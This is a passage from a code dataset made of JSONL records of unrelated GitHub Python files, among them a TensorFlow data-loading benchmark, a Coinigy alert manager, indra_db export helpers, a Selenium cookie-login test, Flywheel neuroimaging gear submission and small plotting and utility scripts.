tf\ntf.compat.v1.disable_eager_execution()\n\n\nFLAGS = flags.FLAGS\nflags.DEFINE_string(\"data_files_pattern\", \"gs://cloud-samples-data/ai-platform/fake_imagenet/train*\",\n \"TFRecords input pattern.\")\nflags.DEFINE_integer(\"num_iterations\", 1000, \"Number of batchs to load.\")\nflags.DEFINE_integer(\"cycle_length\", 20, \"cycle_length parameter for parallel_interleave\")\n\ndef input_fn(data_files_pattern,\n batch_size,\n num_iterations=1):\n filenames = tf.io.gfile.glob(data_files_pattern)\n dataset = tf.data.Dataset.from_tensor_slices(filenames).repeat()\n\n def _read_fn(f):\n return tf.data.TFRecordDataset(f)\n\n dataset = dataset.apply(tf.data.experimental.parallel_interleave(\n map_func=_read_fn,\n cycle_length=FLAGS.cycle_length,\n block_length=1,\n sloppy=True,\n buffer_output_elements=50000,\n prefetch_input_elements=40))\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(5)\n return dataset\n\n\ndef run_benchmark(_):\n num_iterations = FLAGS.num_iterations\n batch_size = 2048\n print('started')\n dataset = input_fn(\n data_files_pattern=FLAGS.data_files_pattern,\n batch_size=batch_size)\n itr = tf.compat.v1.data.make_one_shot_iterator(dataset)\n size = tf.shape(itr.get_next())[0]\n with tf.compat.v1.Session() as sess:\n size_callable = sess.make_callable(size)\n start = time.time()\n n = 0\n mini_batch = 100\n for i in range(num_iterations // mini_batch):\n local_start = time.time()\n start_n = n\n for j in range(mini_batch):\n n += size_callable()\n local_end = time.time()\n print('Processed %d entries in %f seconds. [%f] examples/s' % (\n n - start_n, local_end - local_start,\n (mini_batch * batch_size) / (local_end - local_start)))\n end = time.time()\n print('Processed %d entries in %f seconds. [%f] examples/s' % (\n n, end - start,\n n / (end - start)))\n\n\nif __name__ == '__main__':\n app.run(run_benchmark)\n","repo_name":"vlasenkoalexey/bigquery_perftest","sub_path":"gcs_perftest.py","file_name":"gcs_perftest.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15642429293","text":"import json\nimport datetime\nfrom urllib.request import urlopen, Request\nimport time\nfrom api_keys import coinigykey, coinigysec\n\n\nclass AlertManager:\n def __init__(self, coinigikey, coinigysec, print_output=True):\n \"\"\"\n Object used to manage coinigy alerts\n :param coinigikey: string, coinigy key\n :param coinigysec: string, coinigy secret\n \"\"\"\n self.coinigykey = coinigykey\n self.coinigysec = coinigysec\n self.print_output = print_output\n\n @staticmethod\n def _get_old_alerts():\n # get old alerts\n headers = {'Content-Type': 'application/json', 'X-API-KEY': coinigykey, 'X-API-SECRET': coinigysec}\n values = '{\"exch_code\": \"BTRX\"}'\n values = bytes(values, encoding='utf-8')\n request = Request('https://api.coinigy.com/api/v1/alerts', data=values, headers=headers)\n old_alerts = urlopen(request).read()\n old_alerts = old_alerts.decode(\"utf-8\")\n old_alerts = json.loads(old_alerts)\n return old_alerts\n\n @staticmethod\n def _api_delete_alert(alert_id):\n \"\"\"\n Api call to delete alert\n :param alert_id: srting, id of the alert to delete\n :return:\n \"\"\"\n body = '{\"alert_id\": ' + alert_id + '}'\n body = bytes(body, encoding='utf-8')\n headers = {'Content-Type': 'application/json', 'X-API-KEY': coinigykey, 'X-API-SECRET': coinigysec}\n request = Request('https://api.coinigy.com/api/v1/deleteAlert', data=body, headers=headers)\n response_body = urlopen(request).read()\n time.sleep(1)\n return response_body\n\n def delete_alerts_newer_than(self, newer_than):\n \"\"\"\n Deletes all alerts created after 'newer_than'\n :param newer_than: datetime object\n :return:\n \"\"\"\n\n old_alerts = self._get_old_alerts()\n\n for alert in old_alerts['data']['open_alerts']:\n if datetime.datetime.strptime(alert['alert_added'], '%Y-%m-%d %H:%M:%S') > newer_than:\n resp_body = self._api_delete_alert(alert['alert_id'])\n if self.print_output:\n print(resp_body)\n\n def delete_scanner_alerts(self):\n \"\"\"\n Deletes all alerts created by the scanner\n :return:\n \"\"\"\n\n old_alerts = self._get_old_alerts()\n\n for alert in old_alerts['data']['open_alerts']:\n if \"z_base_scanner\" in alert['alert_note']:\n resp_body = self._api_delete_alert(alert['alert_id'])\n if self.print_output:\n print(resp_body)\n\nif __name__ == \"__main__\":\n ##############VARIABLES TO SET\n from_date = datetime.datetime(year=2017, month=12, day=1, hour=23)\n ##############VARIABLES TO SET\n\n alerts = AlertManager(coinigykey, coinigysec)\n\n alerts.delete_alerts_newer_than(from_date)","repo_name":"payala/trading-scripts","sub_path":"z_manage_alerts.py","file_name":"z_manage_alerts.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70835686248","text":"__all__ = ['get_statement_essentials', 'get_relation_dict',\n 'export_relation_dict_to_tsv']\n\nimport logging\nfrom itertools import permutations\nfrom sqlalchemy import or_\n\nfrom indra.databases import hgnc_client\nfrom indra_db.util import get_db, get_statement_object\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_statement_essentials(clauses, count=1000, db=None, preassembled=True):\n \"\"\"Get the type, agents, and id data for the specified statements.\n\n This function is useful for light-weight searches of basic mechanistic\n information, without the need to follow as many links in the database to\n populate the Statement objects.\n\n To get full statements, use `get_statements`.\n\n Parameters\n ----------\n clauses : list\n list of sqlalchemy WHERE clauses to pass to the filter query.\n count : int\n Number of statements to retrieve and process in each batch.\n db : :py:class:`DatabaseManager`\n Optionally specify a database manager that attaches to something\n besides the primary database, for example a local database instance.\n preassembled : bool\n If true, statements will be selected from the table of pre-assembled\n statements. Otherwise, they will be selected from the raw statements.\n Default is True.\n\n Returns\n -------\n A list of tuples containing:\n `(uuid, sid, hash, type, (agent_1, agent_2, ...))`.\n \"\"\"\n if db is None:\n db = get_db('primary')\n\n stmts_tblname = 'pa_statements' if preassembled else 'raw_statements'\n\n stmt_data = []\n db_stmts = db.select_all(stmts_tblname, *clauses, yield_per=count)\n for db_stmt in db_stmts:\n stmt = get_statement_object(db_stmt)\n sid = db_stmt.id if hasattr(db_stmt, 'id') else None\n stmt_data.append((db_stmt.uuid, sid, stmt.get_hash(shallow=True),\n db_stmt.type, stmt.agent_list()))\n\n return stmt_data\n\n\ndef get_relation_dict(db, groundings=None, with_evidence_count=False,\n with_support_count=False):\n \"\"\"Get a dictionary of entity interactions from the database.\n\n Use only metadata from the database to rapidly get simple interaction data.\n This is much faster than handling the full Statement jsons, while providing\n some basic valuable functionality.\n\n Parameters\n ----------\n db : DatabaseManager instance\n An instance of a database manager.\n groundings : list[str] or None\n Select which types of grounding namespaces to include, e.g. HGNC, or\n FPLX, or both. Only agent refs with these groundings will be selected.\n If None, only HGNC is used.\n with_evidence_count : bool\n Default is False. If True, an additional query will be made for each\n statement to get the count of supporting evidence, which is a useful\n proxy for belief.\n with_support_count : bool\n Default is False. Like `with_evidence_count`, except the number of\n supporting statements is counted.\n \"\"\"\n other_params = []\n if groundings is None:\n other_params.append(db.PAAgents.db_name.like('HGNC'))\n elif len(groundings) == 1:\n other_params.append(db.PAAgents.db_name.like(groundings[0]))\n else:\n ors = []\n for gdng in groundings:\n ors.append(db.PAAgents.db_name.like(gdng))\n other_params.append(or_(*ors))\n\n vals = [db.PAAgents.id, db.PAAgents.db_id, db.PAAgents.role,\n db.PAAgents.db_name, db.PAStatements.type, db.PAStatements.mk_hash]\n\n if with_evidence_count:\n other_params.append(\n db.EvidenceCounts.mk_hash == db.PAStatements.mk_hash\n )\n vals.append(db.EvidenceCounts.ev_count)\n\n # Query the database\n results = db.select_all(\n vals,\n db.PAStatements.mk_hash == db.PAAgents.stmt_mk_hash,\n *other_params, **{'yield_per': 10000}\n )\n\n # Sort into a dict.\n stmt_dict = {}\n for res in results:\n if with_evidence_count:\n ag_id, ag_dbid, ag_role, ag_dbname, st_type, stmt_hash, n_ev = res\n else:\n ag_id, ag_dbid, ag_role, ag_dbname, st_type, stmt_hash = res\n\n # Handle the case that this is or isn't HGNC\n if ag_dbname == 'HGNC':\n ag_tpl = (ag_id, ag_role, ag_dbname, ag_dbid,\n hgnc_client.get_hgnc_name(ag_dbid))\n else:\n ag_tpl = (ag_id, ag_role, ag_dbname, ag_dbid, ag_dbid)\n\n # Add the tuple to the dict in the appropriate manner.\n if stmt_hash not in stmt_dict.keys():\n stmt_dict[stmt_hash] = {'type': st_type, 'agents': [ag_tpl]}\n if with_evidence_count:\n stmt_dict[stmt_hash]['n_ev'] = n_ev\n if with_support_count:\n logger.info('Getting a count of support for %d' % stmt_hash)\n n_sup = db.count(\n db.PASupportLinks,\n db.PASupportLinks.supported_mk_hash == stmt_hash\n )\n stmt_dict[stmt_hash]['n_sup'] = n_sup\n else:\n assert stmt_dict[stmt_hash]['type'] == st_type\n stmt_dict[stmt_hash]['agents'].append(ag_tpl)\n\n # Only return the entries with at least 2 agents.\n return {k: d for k, d in stmt_dict.items() if len(d['agents']) >= 2}\n\n\ndef export_relation_dict_to_tsv(relation_dict, out_base, out_types=None):\n \"\"\"Export a relation dict (from get_relation_dict) to a tsv.\n\n Available output types are:\n\n - \"full_tsv\" : get a tsv with directed pairs of entities (e.g. HGNC\n symbols), the type of relation (e.g. Phosphorylation) and the hash\n of the preassembled statement. Columns are agent_1, agent_2 (where\n agent_1 affects agent_2), type, hash.\n - \"short_tsv\" : like the above, but without the hashes, so only one\n instance of each pair and type trio occurs. However, the information\n cannot be traced. Columns are agent_1, agent_2, type, where agent_1\n affects agent_2.\n - \"pairs_tsv\" : like the above, but without the relation type. Similarly,\n each row is unique. In addition, the agents are undirected. Thus this\n is purely a list of pairs of related entities. The columns are just\n agent_1 and agent_2, where nothing is implied by the ordering.\n\n Parameters\n ----------\n relation_dict : dict\n This should be the output from `get_relation_dict`, or something\n equivalently constructed.\n out_base : str\n The base-name for the output files.\n out_types : list[str]\n A list of the types of tsv to output. See above for details.\n \"\"\"\n # Check to make sure the output types are valid.\n ok_types = ['full_tsv', 'short_tsv', 'pairs_tsv']\n if out_types is None:\n out_types = ok_types[:]\n\n if any(ot not in ok_types for ot in out_types):\n raise ValueError('Invalid output_types: %s. Allowed types are: %s'\n % (out_types, ok_types))\n\n # Now write any tsv's.\n def write_tsv_line(f, row_tpl):\n f.write('\\t'.join(list(row_tpl)) + '\\n')\n\n # Open the tsv files.\n tsv_files = {}\n for output_type in out_types:\n tsv_files[output_type] = open('%s_%s.tsv' % (out_base, output_type),\n 'w')\n\n # Write the tsv files.\n short_set = set()\n very_short_set = set()\n for h, d in relation_dict.items():\n # Do some pre-processing\n roles = sorted([ag_tpl[1] for ag_tpl in d['agents']])\n ag_by_roles = dict.fromkeys(roles)\n for role in roles:\n ag_by_roles[role] = [ag_tpl[-1] for ag_tpl in d['agents']\n if ag_tpl[1] == role]\n if roles == ['OBJECT', 'SUBJECT']:\n data_tpls = [(ag_by_roles['SUBJECT'][0], ag_by_roles['OBJECT'][0],\n d['type'], str(h))]\n elif set(roles) == {'OTHER'}:\n data_tpls = [(a, b, d['type'], str(h))\n for a, b in permutations(ag_by_roles['OTHER'], 2)]\n elif d['type'] == 'Conversion':\n continue # TODO: Handle conversions.\n else:\n print(\"This is weird...\", h, d)\n continue\n\n # Handle writing the various files.\n if 'full_tsv' in out_types:\n for data_tpl in data_tpls:\n write_tsv_line(tsv_files['full_tsv'], data_tpl)\n\n if 'short_tsv' in out_types:\n short_tpls = [t[:-1] for t in data_tpls]\n for t in short_tpls:\n if t not in short_set:\n short_set.add(t)\n write_tsv_line(tsv_files['short_tsv'], t)\n\n if 'pairs_tsv' in out_types:\n vs_tpls ={tuple(sorted(t[:-2])) for t in data_tpls}\n for t in vs_tpls:\n if t not in very_short_set:\n very_short_set.add(t)\n write_tsv_line(tsv_files['pairs_tsv'], t)\n\n # Close the tsv files.\n for file_handle in tsv_files.values():\n file_handle.close()\n\n return relation_dict\n","repo_name":"indralab/indra_db","sub_path":"indra_db/client/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"18860169736","text":"import json\nfrom time import sleep\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestTmp():\n @pytest.fixture(autouse=True)\n def setup_and_teardown(self):\n chrome_arg = webdriver.ChromeOptions()\n chrome_arg.debugger_address = '127.0.0.1:9222'\n #使用本地打开的浏览器进行调试,前提是必须先登录企业微信\n self.driver = webdriver.Chrome(options=chrome_arg)\n # self.driver = webdriver.Chrome()\n yield\n self.driver.quit()\n\n\n def test_cookie_login(self):\n \"\"\"\n 利用 cookie 进行登陆\n :return:\n \"\"\"\n # 存入 cookie\n cookies = self.driver.get_cookies()\n with open(\"tmp2.text\",\"w\", encoding=\"utf-8\") as f:\n json.dump(cookies, f)\n\n # 读取 cookie\n # self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame#index\")\n # with open(\"tmp2.text\", \"r\", encoding=\"utf-8\") as f:\n # # 序列化\n # cookies = json.load(f)\n # for i in cookies:\n # self.driver.add_cookie(i)\n # self.driver.refresh()\n # sleep(6)\n\n #浏览器复用时使用\n def test_login_tmp(self):\n self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame\")\n self.driver.find_element(By.XPATH,'//*[@id=\"menu_apps\"]/span').click()\n\nif __name__ == \"__main__\":\n pytest.main([\"-v\",\"-s\"])","repo_name":"JsoloJ/Hogwarts_CK17_test","sub_path":"test_selenium/selenium_demo.py","file_name":"selenium_demo.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4547368267","text":"from . import Accounts, Profiles, Quote, Transfer\nfrom .exceptions import UndefinedAPI\n\n\nclass BaseCreateByObject:\n api = None\n attributes_map = {}\n\n def __init__(\n self, api_base_url, api_token, private_key_path,\n private_key_passphrase=None):\n if self.api is None:\n raise UndefinedAPI()\n\n self._api = self.api(\n api_base_url, api_token, private_key_path, private_key_passphrase)\n self._methods = [\n method_name for method_name in dir(self._api)\n if callable(getattr(self._api, method_name)) and\n not method_name.startswith('_')]\n\n def __call_method(self, method_name):\n def method(**kwargs):\n for key, value in self.attributes_map.get(method_name, {}).items():\n if key in kwargs:\n continue\n\n val = getattr(self, value)\n if callable(val):\n kwargs[key] = val()\n else:\n kwargs[key] = val\n\n method = getattr(self._api, method_name)\n print(kwargs)\n return method(**kwargs)\n return method\n\n def __getattr__(self, method_name):\n if method_name in self._methods:\n return self.__call_method(method_name)\n return\n\n return super().__getattr__(method_name)\n\n\nclass Accounts(BaseCreateByObject):\n api = Accounts\n\n\nclass Profiles(BaseCreateByObject):\n api = Profiles\n\n\nclass Quote(BaseCreateByObject):\n api = Quote\n\n\nclass Transfer(BaseCreateByObject):\n api = Transfer\n","repo_name":"useme-com/transferwise","sub_path":"transferwise/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29724705828","text":"import json\nfrom typing import Dict, Text, List\n\n\ndef load_json(file_path: Text) -> List[Dict]:\n with open(file_path, 'r') as f:\n config = json.load(f)\n\n return config\n\n\ndef write_json(data, file_path, encoding='utf-8'):\n with open(file_path, 'w', encoding=encoding) as pf:\n json.dump(data, pf, ensure_ascii=False, indent=4)\n\n\ndef load_jsonl(file_path: Text) -> List[Dict]:\n data = []\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n data.append(json.loads(line))\n return data\n\n\ndef write_jsonl(file_path, data):\n with open(file_path, 'w') as pf:\n for item in data:\n obj = json.dumps(item, ensure_ascii=False)\n pf.write(obj + '\\n')\n","repo_name":"phuongnam2002/Spalde","sub_path":"utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25424391060","text":"\"\"\"Data Integrity Fingerprint (DIF).\n\nA reference implementation in Python.\n\nFor specification see https://github.com/expyriment/DIF.\n\n\"\"\"\n\n__author__ = 'Oliver Lindemann , ' \\\n 'Florian Krause '\n\n__version__ = '0.7.6'\n\n\nfrom .dif import DataIntegrityFingerprint\n","repo_name":"expyriment/dataintegrityfingerprint-python","sub_path":"src/dataintegrityfingerprint/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33797155938","text":"#!/usr/bin/python3\n# -*-coding:utf-8 -*-\n\n# Reference:**********************************************\n# @Time : 7/23/2020 4:15 PM\n# @Author : Gaopeng.Bai\n# @File : resolution_pixels.py\n# @User : gaope\n# @Software: PyCharm\n# @Description:\n# Reference:**********************************************\n# coding=utf-8\nimport os #\nfrom PIL import Image\nimport re\nimport cv2\n\n\ndef resize_pixels(image, new_path):\n resize_width = 580\n resize_depth = 580\n\n im = Image.open(image)\n w, h = im.size\n if w < resize_width:\n h_new = int(resize_width * h / w)\n w_new = resize_width\n out = im.resize((w_new, h_new), Image.ANTIALIAS)\n out.save(new_path)\n repair(new_path)\n\n if h < resize_depth:\n h_new = int(resize_depth * w / h)\n w_new = resize_depth\n out = im.resize((h_new, w_new), Image.ANTIALIAS)\n out.save(new_path)\n repair(new_path)\n\n\ndef repair(images):\n im = cv2.imread(images) # 读取图片rgb 格式\n image = Image.fromarray(cv2.cvtColor(im, cv2.COLOR_BGR2RGB)) # 格式转换,bgr转rgb\n image.save(images, quality=95, dpi=(300.0, 300.0)) # 调整图像的分辨率为300,dpi可以更改\n","repo_name":"Gaopeng-Bai/DocEstate","sub_path":"Operations/resolution_pixels.py","file_name":"resolution_pixels.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5689222199","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nimport pathlib\nimport sys\n\nsys.path.insert(0, pathlib.Path(__file__).parents[2].resolve().as_posix())\n\nproject = \"ML UI\"\ncopyright = \"2022, SPbU\"\nauthor = \"SPbU\"\nrelease = \"0.1\"\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nsource_suffix = {\n \".rst\": \"restructuredtext\",\n \".txt\": \"markdown\",\n \".md\": \"markdown\",\n}\n\nextensions = [\n \"myst_parser\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.autodoc\",\n]\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"furo\"\n","repo_name":"quantum-entangled/machine-learning-ui","sub_path":"docs/src/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23403434474","text":"import argparse as ap\nimport logging\n\nfrom cheriplot.core.tool import PlotTool\nfrom cheriplot.plot.provenance import ExecCapLoadStoreScatterPlot\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExecCapScatterPlotTool(PlotTool):\n\n description = \"Scatter plot showing the locations where executable \" \\\n \"capabilities are stored.\"\n\n def init_arguments(self):\n super().init_arguments()\n self.parser.add_argument(\"-m\", \"--vmmap-file\",\n help=\"CSV file containing the VM map dump\"\n \" generated by procstat\", required=True)\n\n def _run(self, args):\n plot = ExecCapLoadStoreScatterPlot(args.trace, args.cache)\n\n plot.set_vmmap(args.vmmap_file)\n\n if args.outfile:\n plot.plot_file = args.outfile\n\n plot.show()\n\ndef main():\n tool = ExecCapScatterPlotTool()\n tool.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CTSRD-CHERI/cheriplot","sub_path":"tools/cap_exec_scatter.py","file_name":"cap_exec_scatter.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33381362600","text":"import numpy as np\r\nimport tensorflow as tf\r\n\r\ndef directed_hausdorff(point_cloud_A, point_cloud_B):\r\n '''\r\n input:\r\n point_cloud_A: Tensor, B x N x 3\r\n point_cloud_B: Tensor, B x N x 3\r\n return:\r\n Tensor, B, directed hausdorff distance, A -> B\r\n '''\r\n npoint = point_cloud_A.shape[1]\r\n\r\n A = tf.expand_dims(point_cloud_A, axis=2) # (B, N, 1, 3)\r\n A = tf.tile(A, (1, 1, npoint, 1)) # (B, N, N, 3)\r\n\r\n B = tf.expand_dims(point_cloud_B, axis=1) # (B, 1, N, 3)\r\n B = tf.tile(B, (1, npoint, 1, 1)) # (B, N, N, 3)\r\n\r\n distances = tf.squared_difference(B, A) # (B, N, N, 3)\r\n distances = tf.reduce_sum(distances, axis=-1) # (B, N, N, 1)\r\n distances = tf.sqrt(distances) # (B, N, N)\r\n\r\n shortest_dists, _ = tf.nn.top_k(-distances)\r\n shortest_dists = tf.squeeze(-shortest_dists) # (B, N)\r\n\r\n hausdorff_dists, _ = tf.nn.top_k(shortest_dists) # (B, 1)\r\n hausdorff_dists = tf.squeeze(hausdorff_dists)\r\n\r\n return hausdorff_dists\r\n\r\nif __name__=='__main__':\r\n u = np.array([\r\n [\r\n [1,0],\r\n [0,1],\r\n [-1,0],\r\n [0,-1]\r\n ], \r\n [\r\n [1,0],\r\n [0,1],\r\n [-1,0],\r\n [0,-1]\r\n ]\r\n ])\r\n\r\n v = np.array([\r\n [\r\n [2,0],\r\n [0,2],\r\n [-2,0],\r\n [0,-4]\r\n ], \r\n [\r\n [2,0],\r\n [0,2],\r\n [-2,0],\r\n [0,-4]\r\n ]\r\n ])\r\n u_tensor = tf.constant(u, dtype=tf.float32)\r\n u_tensor = tf.tile(u_tensor, (1,500,1))\r\n v_tensor = tf.constant(v, dtype=tf.float32)\r\n v_tensor = tf.tile(v_tensor, (1,500,1))\r\n distances = directed_hausdorff(u_tensor, v_tensor)\r\n distances1 = directed_hausdorff(v_tensor, u_tensor)\r\n\r\n with tf.Session() as sess:\r\n # Init variables\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n\r\n d_val = sess.run(distances)\r\n print(d_val)\r\n print(d_val.shape)\r\n\r\n d_val1 = sess.run(distances1)\r\n print(d_val1)\r\n print(d_val1.shape)\r\n","repo_name":"xuelin-chen/pcl2pcl-gan-pub","sub_path":"pc2pc/structural_losses_utils/tf_hausdorff_distance.py","file_name":"tf_hausdorff_distance.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"30633780459","text":"import flywheel\nimport datetime\n\n# Initialize gear stuff\nnow = datetime.datetime.now().strftime(\"%y/%m/%d_%H:%M\")\nfw = flywheel.Client()\nproj = fw.projects.find_first('label=AGTC_OL')\nsubjects = proj.subjects()\nanalyses = fw.get_analyses('projects', proj.id, 'sessions')\nstruct = [ana for ana in analyses if ana.label.startswith('hcp-struct')]\nfunc = [ana for ana in analyses if ana.label.startswith('hcp-func')]\nsessions_that_have_func = []\nfor f in func:\n sessions_that_have_func.append(f.parent.id)\nqp = fw.lookup('gears/hcp-func/0.1.7')\nanalysis_label = 'hcp-func %s' % qp.gear.version\n\nfreesurfer_license = proj.get_file('freesurfer_license.txt')\ncoef_grad = proj.get_file('coeff.grad')\n\n\nfor subject in subjects:\n subject_id = subject.label\n if subject_id != 'HEROgka1':\n sessions = subject.sessions()\n for session in sessions:\n if session.id not in sessions_that_have_func:\n for st in struct:\n if subject.id == st.parents.subject:\n struct_gear = st\n struct_result = struct_gear.get_file(subject_id + '_hcpstruct.zip')\n \n acquisition_list=[]\n acquisitions = session.acquisitions()\n for acquisition in acquisitions:\n if acquisition.label == 'fmap_dir-AP_acq-SpinEchoFieldMap':\n spin_echo_negative = acquisition \n spin_echo_negative = spin_echo_negative.files[1]\n if acquisition.label == 'fmap_dir-PA_acq-SpinEchoFieldMap':\n spin_echo_positive = acquisition\n spin_echo_positive = spin_echo_positive.files[1]\n \n inputs = {'FreeSurferLicense': freesurfer_license, 'GradientCoeff': coef_grad, \n 'SpinEchoNegative': spin_echo_negative, 'SpinEchoPositive': spin_echo_positive,\n 'StructZip': struct_result}\n \n\n config = {'AnatomyRegDOF': 6, 'BiasCorrection': 'SEBased', 'MotionCorrection': 'MCFLIRT',\n 'RegName': 'FS', 'Subject': subject_id}\n \n for acquisition in acquisitions:\n if 'func_task' in acquisition.label and 'SBRef' not in acquisition.label and 'PhysioLog' not in acquisition.label:\n acq = acquisition \n label = acquisition.label\n for i in acq.files:\n if 'nii.gz' in i.name:\n acquisition_to_run = i \n for ref in acquisitions:\n if label + '_SBRef' == ref.label:\n scout = ref.files[1]\n inputs['fMRIScout'] = scout \n inputs['fMRITimeSeries'] = acquisition_to_run\n config['fMRIName'] = label[10:] \n new_analysis_label = analysis_label + ' ' + '[' + label[10:] + ']' + ' ' + now\n _id = qp.run(analysis_label=new_analysis_label, config=config, \n inputs=inputs, destination=session)\n \n \n","repo_name":"gkaguirrelab/mriAGTCAnalysis","sub_path":"code/submitGears/AGTC_OL/2-submitHCPFunc.py","file_name":"2-submitHCPFunc.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7245427617","text":"import matplotlib.pyplot as plt\nimport pandas\nimport base64\nimport io\n\ndef percentage(pct, data):\n absolute = int(pct / 100. * sum(data))\n return \"{:.1f}%\\n({:d})\".format(pct, absolute)\n\ndef generatePieChart(params):\n column_list = [\"sl_no\", \"gender\", \"ssc_p\", \"ssc_b\", \"hsc_p\", \"hsc_b\", \"hsc_s\", \"degree_p\", \"degree_t\", \"workexp\",\n \"etest_p\", \"specialisation\", \"mba_p\", \"status\", \"salary\"]\n\n df = pandas.read_csv(\"codebase/datasets/dataset.csv\", usecols=column_list)\n\n if(params[\"filter\"][\"gender\"] != \"both\"):\n df = df[(df[\"gender\"] == params[\"filter\"][\"gender\"])]\n\n if (params[\"filter\"][\"subjects\"] != \"all\"):\n df = df[(df[\"degree_t\"] == params[\"filter\"][\"subjects\"])]\n\n labels = df[params[\"x_axis\"]]\n\n labelArr = []\n countArr = []\n\n for (label, count) in labels.value_counts().iteritems():\n labelArr.append(label)\n countArr.append(count)\n\n plt.clf()\n\n plt.title(\"Generated Chart\")\n patches, texts, junk = plt.pie(countArr, labels=labelArr, autopct=lambda pct: percentage(pct, countArr))\n\n if (params[\"filter\"][\"legend\"]):\n plt.legend(patches, labelArr)\n\n bytes = io.BytesIO()\n\n plt.savefig(bytes, format=\"jpg\")\n bytes.seek(0)\n\n b64 = base64.b64encode(bytes.read()).decode(\"ascii\")\n\n return b64","repo_name":"Sarthakbh321/DV-Project-Backend","sub_path":"codebase/pie_chart.py","file_name":"pie_chart.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"3188719319","text":"import pandas as pd\nfrom pymatgen.analysis.graphs import StructureGraph\nfrom pymatgen.analysis.local_env import CrystalNN\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n \"\"\"\n >>> df = pd.read_pickle(\"out/selenium_stable_bandgap.pkl\")\n \n >>> type(df)\n \n \n >>> len(df)\n 1830\n \n >>> df.columns\n Index(['structure', 'band_gap'], dtype='object')\n \n >>> type(df['structure'])\n \n \n >>> type(df['structure'][0])\n \n \n >>> print(df['structure'][0])\n Full Formula (Lu1 Tl1 Se2)\n Reduced Formula: LuTlSe2\n abc : 8.125496 8.125496 8.125495\n angles: 29.329221 29.329221 29.329219\n Sites (4)\n # SP a b c magmom\n --- ---- -------- -------- -------- --------\n 0 Lu 0 0 0 0\n 1 Tl 0.5 0.5 0.5 -0\n 2 Se 0.733155 0.733155 0.733155 0\n 3 Se 0.266845 0.266845 0.266845 0\n \n >>> type(df['band_gap'])\n \n \n >>> type(df['band_gap'][0])\n \n \n >>> print(df['band_gap'][0])\n 1.2344\n \"\"\"\n # df = pd.read_pickle(\"out/selenium_stable_bandgap.pkl\")\n df = pd.read_pickle(\"out/all_stable_bandgap.pkl\")\n\n names = {}\n elements = {i: 0 for i in range(1, 119)}\n\n for i in range(len(df['structure'])):\n struct = df['structure'][i]\n\n # if struct.formula == \"Li2 Zn2\":\n # struct = struct*2\n # gr = StructureGraph.with_local_env_strategy(struct, CrystalNN())\n # labels = {i:spec.name for i, spec in enumerate(struct.species)}\n # nx.draw(gr.graph, pos=nx.shell_layout(gr.graph), with_labels=True, labels=labels)\n # plt.show()\n # break\n\n # if 'Li' in struct.symbol_set:\n # print(struct.formula)\n\n for spec in struct.species:\n if not spec.name in names:\n names[spec.name] = 0\n names[spec.name] += 1\n\n elements[spec.number] += 1\n\n print(len(df))\n print(len(names))\n print(names)\n for i in sorted(elements):\n print(i, elements[i])\n","repo_name":"lantunes/materials-sandbox","sub_path":"analyze_se_data.py","file_name":"analyze_se_data.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36453560489","text":"import tkinter as tk\r\nfrom tkcalendar import Calendar\r\nfrom tkinter import messagebox\r\n\r\ndef add_event():\r\n add_event_win = tk.Tk()\r\n add_event_win.geometry 